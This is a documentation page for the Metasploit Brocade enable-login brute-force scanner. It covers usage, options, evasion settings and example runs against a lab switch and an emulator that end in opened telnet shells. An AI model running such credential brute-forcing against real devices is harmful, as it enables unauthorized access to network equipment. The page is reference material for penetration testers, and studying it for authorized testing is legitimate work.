Brocade Enable Login Check Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/telnet/brocade_enable_login metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Brocade Enable Login Check Scanner
Module: auxiliary/scanner/telnet/brocade_enable_login
Source code: modules/auxiliary/scanner/telnet/brocade_enable_login.rb
Disclosure date: -
Last modification time: 2021-08-31 17:10:07 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: telnet
Target network port(s): 23
List of CVEs: CVE-1999-0502

This module will test a range of Brocade network devices for a privileged logins and report successes. The device authentication mode must be set as 'aaa authentication enable default local'. Telnet authentication, e.g. 'enable telnet authentication', should not be enabled in the device configuration. This module has been tested against the following devices: ICX6450-24 SWver 07.4.00bT311, FastIron WS 624 SWver 07.2.02fT7e1

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/telnet/brocade_enable_login
msf auxiliary(brocade_enable_login) > show options
    ... show and set options ...
msf auxiliary(brocade_enable_login) > set RHOSTS ip-range
msf auxiliary(brocade_enable_login) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(brocade_enable_login) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(brocade_enable_login) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(brocade_enable_login) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module is a login bruteforcer against Brocade network device's enable feature.

To configure the device in a vulnerable fashion, follow these steps: 1. Set authentication mode via: aaa authentication enable default local

This module works against enable so we want to ensure telnet itself has no auth The following should not be set: enable telnet authentication

This module has been verified against: 1. ICX6450-24 SWver 07.4.00bT311 2. FastIron WS 624 SWver 07.2.02fT7e1

An emulator is available here

Verification Steps


  1. Install the emulator or device
  2. Start msfconsole
  3. Do: use auxiliary/scanner/telnet/brocade_enable_login
  4. Create/set a password file: set pass_file /<passwords.lst>
  5. If desired: set user_as_pass true
  6. Do: set rhosts <ip>
  7. Do: run
  8. You should get a shell.

Scenarios


Example run against ICX6450-24 SWver 07.4.00bT311

msf > use auxiliary/scanner/telnet/brocade_enable_login 
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
rhosts => 192.168.50.1
msf auxiliary(brocade_enable_login) > run

[*]  Attempting username gathering from config on 192.168.50.1
[*]    Found: [email protected]
[*]    Found: [email protected]
[*]    Found: [email protected]
[*]  Attempting username gathering from running-config on 192.168.50.1
[*]    Found: [email protected]
[*]    Found: [email protected]
[*]    Found: [email protected]
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
[*] Attempting to start session 192.168.50.1:23 with admin:admin
[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
[*] Attempting to start session 192.168.50.1:23 with read:read
[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
[*] Attempting to start session 192.168.50.1:23 with port:port
[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l

Active sessions
===============

  Id  Type    Information                           Connection
  --  ----    -----------                           ----------
  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)

msf auxiliary(brocade_enable_login) > session -i 1
[-] Unknown command: session.
msf auxiliary(brocade_enable_login) > sessions -i 1
[*] Starting interaction with 1...

show sessions ?
Unrecognized command
BR-telnet@FWS624 Router#show ?
  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
  aaa                    Show TACACS+ and RADIUS server statistics
  access-list            show IPv4 access-list information
  acl-on-arp             Show ARP ACL filtering
  arp                    Arp table
  auth-mac-addresses     MAC Authentication status
  batch                  Batch commands
  boot-preference        System boot preference
  buffer-profile         Displays active profile
  cable-diagnostics      Show Cable Diagnostics
  chassis                Power supply/fan/temperature
  clock                  System time and date
  configuration          Configuration data in startup config file
  cpu-utilization        CPU utilization rate
  debug                  Debug information
  default                System default settings
  dot1x                  Dot1x information
  errdisable             Errdisable status
  fdp                    CDP/FDP information
  flash                  Flash memory contents
  gvrp                   GVRP information
  inline                 inline power information
  interfaces             Port status
--More--, next page: Space, next line: Return key, quit: Control-c 
  ip                     IP address setting
  ipv6                   IP setting
  license                Show license information
  link-aggregate         802.3ad Link Aggregation Information
  link-error-disable     Link Debouncing Control
  link-keepalive         Link Layer Keepalive
  lldp                   Link-Layer Discovery Protocol information
  local-userdb           Local User Database information
  logging                System log
  loop-detection         loop detection status & disabled ports
  mac-address            MAC address table
  media                  1Gig/10G port media type
  memory                 System memory usage
  metro-ring             Metro ring protocol information
  mirror                 Mirror ports
  module                 Module type and status
  monitor                Monitor ports
  mstp                   show MSTP (IEEE 802.1s) information
  optic                  Optic Temperature and Power
  port                   Show port security
  priority-mapping       802.1Q tagged priority setting
  processes              Active process statistics
  protected-link-group   Show Protected Link Group Details
--More--, next page: Space, next line: Return key, quit: Control-c 
  ptrace                 Global ptrace information
  qd-buffer-profile      User configured buffer/descriptor profiles
  qos-profiles           QOS configuration
  qos-tos                IPv4 ToS based QoS
  radius                 show radius server debug info
  rate-limit             Rate-limiting table and actions
  redundancy             Display management redundancy details
  relative-utilization   Relative utilization list
  reload                 Scheduled system reset
  reserved-vlan-map      Reserved VLAN map status
  rmon                   Rmon status
  running-config         Current running-config
  scheduler-profile      User configured scheduling profiles
  sflow                  sFlow information
  snmp                   SNMP statistics
  sntp                   Show SNTP
  span                   Spanning tree status
  statistics             Packet statistics
  stp-bpdu-guard         BPDU Guard status
  stp-group              Spanning Tree Group Membership
  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
                         counters
  table-mac-vlan         MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c 
  tech-support           System snap shot for tech support
  telnet                 Telnet connection
  topology-group         Topology Group Membership
  traffic-policy         Show traffic policy definition
  trunk                  Show trunk status
  users                  User accounts
  v6-l4-acl-sessions     Show IPv6 software sessions
  version                System status
  vlan                   VLAN status
  vlan-group             VLAN Group Membership
  voice-vlan             Show voice vlan
  vsrp                   Show VSRP commands
  web-connection         Current web connections
  webauth                web authentication information
  who                    User login
  |                      Output modifiers
  
BR-telnet@FWS624 Router#

Example run against emulator mentioned above:

msf > use auxiliary/scanner/telnet/brocade_enable_login 
msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > run

[*]  Attempting username gathering from config on 127.0.0.1
[*]    Found: [email protected]
[*]    Found: [email protected]
[*]    Found: [email protected]
[*]  Attempting username gathering from running-config on 127.0.0.1
[*]    Found: [email protected]
[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
[*] Attempting to start session 127.0.0.1:23 with username:password
[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l

Active sessions
===============

  Id  Type    Information                              Connection
  --  ----    -----------                              ----------
  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)

msf auxiliary(brocade_enable_login) >

Go back to menu.

Msfconsole Usage


Here is how the scanner/telnet/brocade_enable_login auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/telnet/brocade_enable_login

msf6 auxiliary(scanner/telnet/brocade_enable_login) > show info

       Name: Brocade Enable Login Check Scanner
     Module: auxiliary/scanner/telnet/brocade_enable_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  h00die <[email protected]>

Check supported:
  No

Basic options:
  Name                       Current Setting  Required  Description
  ----                       ---------------  --------  -----------
  BLANK_PASSWORDS            false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED           5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS               false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS                false            no        Add all passwords in the current database to the list
  DB_ALL_USERS               false            no        Add all users in the current database to the list
  GET_USERNAMES_FROM_CONFIG  true             no        Pull usernames from config and running config
  PASSWORD                                    no        A specific password to authenticate with
  PASS_FILE                                   no        File containing passwords, one per line
  RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT                      23               yes       The target port (TCP)
  STOP_ON_SUCCESS            false            yes       Stop guessing when a credential works for a host
  THREADS                    1                yes       The number of concurrent threads (max one per host)
  USERNAME                                    no        A specific username to authenticate as
  USERPASS_FILE                               no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS               false            no        Try the username as the password for all users
  USER_FILE                                   no        File containing usernames, one per line
  VERBOSE                    true             yes       Whether to print output for all attempts

Description:
  This module will test a range of Brocade network devices for a 
  privileged logins and report successes. The device authentication 
  mode must be set as 'aaa authentication enable default local'. 
  Telnet authentication, e.g. 'enable telnet authentication', should 
  not be enabled in the device configuration. This module has been 
  tested against the following devices: ICX6450-24 SWver 07.4.00bT311, 
  FastIron WS 624 SWver 07.2.02fT7e1

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0502

Module Options


This is a complete list of options available in the scanner/telnet/brocade_enable_login auxiliary module:

msf6 auxiliary(scanner/telnet/brocade_enable_login) > show options

Module options (auxiliary/scanner/telnet/brocade_enable_login):

   Name                       Current Setting  Required  Description
   ----                       ---------------  --------  -----------
   BLANK_PASSWORDS            false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED           5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS               false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS                false            no        Add all passwords in the current database to the list
   DB_ALL_USERS               false            no        Add all users in the current database to the list
   GET_USERNAMES_FROM_CONFIG  true             no        Pull usernames from config and running config
   PASSWORD                                    no        A specific password to authenticate with
   PASS_FILE                                   no        File containing passwords, one per line
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                      23               yes       The target port (TCP)
   STOP_ON_SUCCESS            false            yes       Stop guessing when a credential works for a host
   THREADS                    1                yes       The number of concurrent threads (max one per host)
   USERNAME                                    no        A specific username to authenticate as
   USERPASS_FILE                               no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS               false            no        Try the username as the password for all users
   USER_FILE                                   no        File containing usernames, one per line
   VERBOSE                    true             yes       Whether to print output for all attempts

Advanced Options


Here is a complete list of advanced options supported by the scanner/telnet/brocade_enable_login auxiliary module:

msf6 auxiliary(scanner/telnet/brocade_enable_login) > show advanced

Module advanced options (auxiliary/scanner/telnet/brocade_enable_login):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CHOST                                        no        The local client address
   CPORT                                        no        The local client port
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   ConnectTimeout              10               yes       Maximum number of seconds to establish a TCP connection
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   MaxGuessesPerService        0                no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
   MaxGuessesPerUser           0                no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.
                                                          2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.
   MaxMinutesPerService        0                no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   REMOVE_PASS_FILE            false            yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE        false            yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE            false            yes       Automatically delete the USER_FILE on module completion
   SSL                         false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                    no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode               PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion                  Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress                true             yes       Display progress messages during a scan
   ShowProgressPercent         10               yes       The interval in percent that progress should be shown
   TRANSITION_DELAY            0                no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
   TelnetBannerTimeout         25               yes       The number of seconds to wait for the initial banner
   TelnetTimeout               10               yes       The number of seconds to wait for a reply from a Telnet command
   WORKSPACE                                    no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/telnet/brocade_enable_login module can do:

msf6 auxiliary(scanner/telnet/brocade_enable_login) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/telnet/brocade_enable_login auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/telnet/brocade_enable_login) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL> (<RESULT.STATUS>: <RESULT.PROOF>)


Here is a relevant code snippet related to the "<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL> (<RESULT.STATUS>: <RESULT.PROOF>)" error message:

130:	          create_credential_login(credential_data)
131:	          print_good("#{ip}:#{rport} - Login Successful: #{result.credential}")
132:	          start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)
133:	        else
134:	          invalidate_login(credential_data)
135:	          print_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")
136:	        end
137:	      end
138:	    end
139:	  end
140:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


h00die <mike[at]shorebreaksecurity.com>

Version


This page has been produced using Metasploit Framework version 6.1.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.